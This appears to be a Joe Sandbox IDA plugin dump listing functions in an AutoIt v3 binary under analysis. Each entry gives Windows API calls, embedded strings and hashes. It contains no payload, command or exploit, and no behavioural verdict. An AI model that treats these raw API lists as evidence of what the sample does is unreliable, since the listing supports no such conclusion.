                                                                                                                                                        • API String ID: 975902462-1005189915
                                                                                                                                                        • Opcode ID: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                                                                                                                                                        • Instruction ID: 584789cb2ae79e073c8e87f28fc1e0f9257b5eb674b0cd9772254fc63eed773b
                                                                                                                                                        • Opcode Fuzzy Hash: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                                                                                                                                                        • Instruction Fuzzy Hash: F021C4B5900318AFDB10DFA8E849BCEBBF4FB08701F50895AF615A72A0DBB44544CF91

                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF23E6
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF2579
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF259D
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25DD
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25FF
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF2760
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00AF2792
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF27C1
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF2838
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4090791747-0
                                                                                                                                                        • Opcode ID: 7d23601338715af0ce084c4e32294f8cff1292303314c044eb071745676ddd86
                                                                                                                                                        • Instruction ID: e5efd82413fb31dbaf5ceeea81788936146433d01724bd19df93d6a5114372c9
                                                                                                                                                        • Opcode Fuzzy Hash: 7d23601338715af0ce084c4e32294f8cff1292303314c044eb071745676ddd86
                                                                                                                                                        • Instruction Fuzzy Hash: 89D1BD31604305DFCB14EF64C991B6ABBE5EF85320F14885DF9899B2A2DB30DC41CB52

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                        • Opcode ID: 0a5e1303f16fb98795032268325150d1b6feac0bdcd3ec812c1be0800e3ec163
                                                                                                                                                        • Instruction ID: c2c6e97f04fe03f06f7aaeb87a80c18363bc3e817bd557c4db35e651b07584fd
                                                                                                                                                        • Opcode Fuzzy Hash: 0a5e1303f16fb98795032268325150d1b6feac0bdcd3ec812c1be0800e3ec163
                                                                                                                                                        • Instruction Fuzzy Hash: 70E1D471A00259AFDF10DFA9C981BEE77B9FF48364F148069F949AB281D7709D42CB90

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                                        • Opcode ID: 2824bba5cf30e1982139e74894f4890a25b9760ffc5f6ed84b3c87e49d952833
                                                                                                                                                        • Instruction ID: 7c9b52fe13ac65fe90c9e1575139204d530944960d0c7aa76e6cced0fb47d2ce
                                                                                                                                                        • Opcode Fuzzy Hash: 2824bba5cf30e1982139e74894f4890a25b9760ffc5f6ed84b3c87e49d952833
                                                                                                                                                        • Instruction Fuzzy Hash: DC91BF71A00255EBDF24DFA6CC44FEEBBB8AF45720F108559F515AB281D7709A42CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00AAEADA,?,?), ref: 00B04B26
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00AAEADA,?,?), ref: 00B04B65
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00AAEADA,?,?), ref: 00B04B94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                                        • Opcode ID: b82ba2bfe1d238aadb12b69c6a43367bfa7a2b83af8e5c292208975f44259cad
                                                                                                                                                        • Instruction ID: af74244660528c4d531611bb33ce0be9abfc001986deaeb1cd36fc422f034059
                                                                                                                                                        • Opcode Fuzzy Hash: b82ba2bfe1d238aadb12b69c6a43367bfa7a2b83af8e5c292208975f44259cad
                                                                                                                                                        • Instruction Fuzzy Hash: 2A113D71601118BEEF05DBA4DD9AEFE77BCEB08354F504059B506E70A1EA709E01D760
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00A92ECB
                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A92F00
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A92F09
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                        • Opcode ID: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                                                                                                                                                        • Instruction ID: 5ecc28c692c381f4bd654aa5ee1012fc29b68803d825031f8825a540bed6b18e
                                                                                                                                                        • Opcode Fuzzy Hash: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                                                                                                                                                        • Instruction Fuzzy Hash: B5F0D0715403D07AD731975B6C48F672E7ED7CBF11B05455EBA08931F0C9610895DAB0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AD6DC5
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                                                                                                                                                        • _wcsrchr.LIBCMT ref: 00AD6DFB
                                                                                                                                                          • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6E31
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3633006590-0
                                                                                                                                                        • Opcode ID: 50a051a8a8729ae1a7c2462bbff9844cf4f91f8d9116329c12e59f9aee196587
                                                                                                                                                        • Instruction ID: 05d2b7f848171ea52005fdeee00729656664aa689b5bc6dfea293196898d9367
                                                                                                                                                        • Opcode Fuzzy Hash: 50a051a8a8729ae1a7c2462bbff9844cf4f91f8d9116329c12e59f9aee196587
                                                                                                                                                        • Instruction Fuzzy Hash: BC2136756003189ADF20BBB8FD4AAEA33ACCF01310F600657E062C32D3EF20DE848A50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AEACD3: inet_addr.WS2_32(00000000), ref: 00AEACF5
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00AE9160
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE916F
                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 00AE918B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3701255441-0
                                                                                                                                                        • Opcode ID: 095777f6cd7181f5b7f67bfeb120d15ce4c5803a395bf076ae36f9266bac7ab7
                                                                                                                                                        • Instruction ID: fd92ef4608e0e86487e1346cdbbeda68e9af25ef30945ba8d1acc1e9cef51aab
                                                                                                                                                        • Opcode Fuzzy Hash: 095777f6cd7181f5b7f67bfeb120d15ce4c5803a395bf076ae36f9266bac7ab7
                                                                                                                                                        • Instruction Fuzzy Hash: 32219D313006119FDB00AF68CD89BAE77E9EF89724F048559F916AB3D2DB74EC418B51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                                                                                                                                                        • _free.LIBCMT ref: 00B03C27
                                                                                                                                                        • _free.LIBCMT ref: 00B03C6E
                                                                                                                                                          • Part of subcall function 00A9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                                                                                                                                                          • Part of subcall function 00A9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                                                                                                                                                          • Part of subcall function 00A9BDF0: __wsplitpath.LIBCMT ref: 00A9BF19
                                                                                                                                                          • Part of subcall function 00A9BDF0: _wcscpy.LIBCMT ref: 00A9BF31
                                                                                                                                                          • Part of subcall function 00A9BDF0: _wcscat.LIBCMT ref: 00A9BF46
                                                                                                                                                          • Part of subcall function 00A9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                        • API String ID: 1510338132-1757145024
                                                                                                                                                        • Opcode ID: 83b54c733c8fb520efc13ff8c7f58021d4ca0abdb9a3deaeb1ebbcf9ea3827be
                                                                                                                                                        • Instruction ID: cfc806eab940feaebf4d9612d7798cca6d19496747a398e12df7e08328639063
                                                                                                                                                        • Opcode Fuzzy Hash: 83b54c733c8fb520efc13ff8c7f58021d4ca0abdb9a3deaeb1ebbcf9ea3827be
                                                                                                                                                        • Instruction Fuzzy Hash: 1E917F71A10219AFCF04EFA4DD959EEBBF8FF19710F14446AF416AB291DB349A04CB50
                                                                                                                                                        APIs
                                                                                                                                                        • __getstream.LIBCMT ref: 00AB418E
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AB41C9
                                                                                                                                                        • __wopenfile.LIBCMT ref: 00AB41D9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                        • String ID: <G
                                                                                                                                                        • API String ID: 1820251861-2138716496
                                                                                                                                                        • Opcode ID: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                                                                                                                                                        • Instruction ID: 88a9b229bd54ac49604c7f803ea5b6bd02b002a3400feebc9bb07f4a7202b550
                                                                                                                                                        • Opcode Fuzzy Hash: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                                                                                                                                                        • Instruction Fuzzy Hash: 03110A70D002169FDB10BFBC9D426EF37FCAF58390B148625A815DB283EB74C981A761
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AAC948,SwapMouseButtons,00000004,?), ref: 00AAC979
                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC99A
                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC9BC
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                        • Opcode ID: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                                                                                                                                                        • Instruction ID: c38d93e10fd6692563cf4cb55a74a9c81aa4eb21c628d8f0411b76afe17ce69f
                                                                                                                                                        • Opcode Fuzzy Hash: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                                                                                                                                                        • Instruction Fuzzy Hash: 52117C75511208FFEB128F64DC44EEF7BB8EF09750F00841AB841E7250D7319E409B60
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                                                                                                                                                        • Instruction ID: f3fa42ce0f739344cd6c00ea0a8a83912b2206d6cc52873a73a6019ba41613c1
                                                                                                                                                        • Opcode Fuzzy Hash: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                                                                                                                                                        • Instruction Fuzzy Hash: 17C14975A0021AEBCB14CFA4C984FBEB7B5FF58708F118599E912AB251D730DE41CBA1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        • _free.LIBCMT ref: 00ADCDC9
                                                                                                                                                        • _free.LIBCMT ref: 00ADCDD0
                                                                                                                                                        • _free.LIBCMT ref: 00ADCE3B
                                                                                                                                                          • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                                                                                                                                                          • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                                                                                                                                                        • _free.LIBCMT ref: 00ADCE43
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                        • Instruction ID: 74006ccdececbb7277ea31d4b5f23da708f6cb3c6deee2c81bce5df0e1969cbe
                                                                                                                                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                        • Instruction Fuzzy Hash: 15513EB1A04219AFDF159F64CC81BAEB7B9EF48310F1040AEF659A3251DB715A80CF59
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00A91E87
                                                                                                                                                          • Part of subcall function 00A938E4: _memset.LIBCMT ref: 00A93965
                                                                                                                                                          • Part of subcall function 00A938E4: _wcscpy.LIBCMT ref: 00A939B5
                                                                                                                                                          • Part of subcall function 00A938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00A91EDC
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A91EEB
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B04526
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                                        • Opcode ID: 8f5974af4c5a97498afb4f80eef948afc2e449472cc645dac55bbe2486e54ad8
                                                                                                                                                        • Instruction ID: e5ce5b3498c5891251d2a6cae2051be88190da6b6565c87134ab2cc09bdfd0bc
                                                                                                                                                        • Opcode Fuzzy Hash: 8f5974af4c5a97498afb4f80eef948afc2e449472cc645dac55bbe2486e54ad8
                                                                                                                                                        • Instruction Fuzzy Hash: 4F21D7B1504794AFEB3287248C55BEBBFEC9B12308F0404CDE79E57281C7745A84CB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00AE92F0
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE92FB
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE9328
                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00AE9333
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1504782959-0
                                                                                                                                                        • Opcode ID: e0aba6f5deae09f213a23417450328de1459d45638e9d8c45afea71c4bc1a0b3
                                                                                                                                                        • Instruction ID: 901c725e4d550f5df8075337626d740bf923dc676a59442e93d15d098a937a25
                                                                                                                                                        • Opcode Fuzzy Hash: e0aba6f5deae09f213a23417450328de1459d45638e9d8c45afea71c4bc1a0b3
                                                                                                                                                        • Instruction Fuzzy Hash: 13112B76A00109AFCF05FBA1CE56DEEB7B9EF14311B544065F506AB2A2DB30AE14CB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                                                                                                                                                          • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                                                                                                                                                          • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(00D90000,00000000,00000001), ref: 00AB462F
                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                          • Part of subcall function 00AB7495: RaiseException.KERNEL32(?,?,00A9125D,00B46598,?,?,?,00AB0158,00A9125D,00B46598,?,00000001), ref: 00AB74E6
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                        • API String ID: 3902256705-2104205924
                                                                                                                                                        • Opcode ID: 535a6567751d78808e3929fb3263edb4caf6b3b2ffd60278c8404e10cd347b2d
                                                                                                                                                        • Instruction ID: 81ab5d4c5f32a8f3e8106f86028af34872e81b4d649c45f0525a30782319111f
                                                                                                                                                        • Opcode Fuzzy Hash: 535a6567751d78808e3929fb3263edb4caf6b3b2ffd60278c8404e10cd347b2d
                                                                                                                                                        • Instruction Fuzzy Hash: E1F0C87510421DA6C719FBACED02EDF7BEC9F04350F504556F90596183DBB08A80A7A5
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 53cb7de3d3d89f3cc4e46414e21d605ad035caa77b45ca43a0b2959edb3c91bf
                                                                                                                                                        • Instruction ID: 8e3f0c71874f3350e180b189b696fb3e37ee64d7ee081cb2311a37e5bfa616d8
                                                                                                                                                        • Opcode Fuzzy Hash: 53cb7de3d3d89f3cc4e46414e21d605ad035caa77b45ca43a0b2959edb3c91bf
                                                                                                                                                        • Instruction Fuzzy Hash: 74F17B71A047419FCB10DF29C980B5AB7E5FF88314F10896EF9999B292DB31E945CF82
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00A9C00E,?,?,?,?,00000010), ref: 00A9C627
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00A9C65F
                                                                                                                                                        • _memmove.LIBCMT ref: 00A9C697
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                                        • Opcode ID: a9195a9a481ba9e03cf2908a8bad66bfd8be5d11e002b5ba1997abd481008d03
                                                                                                                                                        • Instruction ID: 384b2ef630d76ac9748757a7b46733b6966f48569446cf824aedf25cea036f6e
                                                                                                                                                        • Opcode Fuzzy Hash: a9195a9a481ba9e03cf2908a8bad66bfd8be5d11e002b5ba1997abd481008d03
                                                                                                                                                        • Instruction Fuzzy Hash: AF3107B23016016BDB289B78DC46F6BB7D9EF44360F10553AF95ACB2D1EB32E9108751
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                                                                                                                                                          • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3981382179-0
                                                                                                                                                        • Opcode ID: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                                                                                                                                                        • Instruction ID: 8ec6f50b6d5c59241c16c326eb697d4876b1d60b80cd49966096329aa689499e
                                                                                                                                                        • Opcode Fuzzy Hash: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                                                                                                                                                        • Instruction Fuzzy Hash: 0F213D76B00114ABCF14DB95D884EEEB7BDEF88740B104094F609D7255DB309E46CB90
                                                                                                                                                        APIs
                                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00AB4603
                                                                                                                                                          • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E79
                                                                                                                                                          • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E83
                                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00AB460A
                                                                                                                                                          • Part of subcall function 00AB8EB2: GetModuleFileNameW.KERNEL32(00000000,00B50312,00000104,?,00000001,00AB0127), ref: 00AB8F44
                                                                                                                                                          • Part of subcall function 00AB8EB2: ___crtMessageBoxW.LIBCMT ref: 00AB8FF2
                                                                                                                                                          • Part of subcall function 00AB1D65: ___crtCorExitProcess.LIBCMT ref: 00AB1D6B
                                                                                                                                                          • Part of subcall function 00AB1D65: ExitProcess.KERNEL32 ref: 00AB1D74
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00D90000,00000000,00000001), ref: 00AB462F
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                                        APIs
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00A9E646
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00A9E651
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 00ADC45E
                                                                                                                                                          • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                                                                                                                                                          • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                                                                                                                                                        • _free.LIBCMT ref: 00ADC46F
                                                                                                                                                        • _free.LIBCMT ref: 00ADC481
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: CALL
                                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                                        APIs
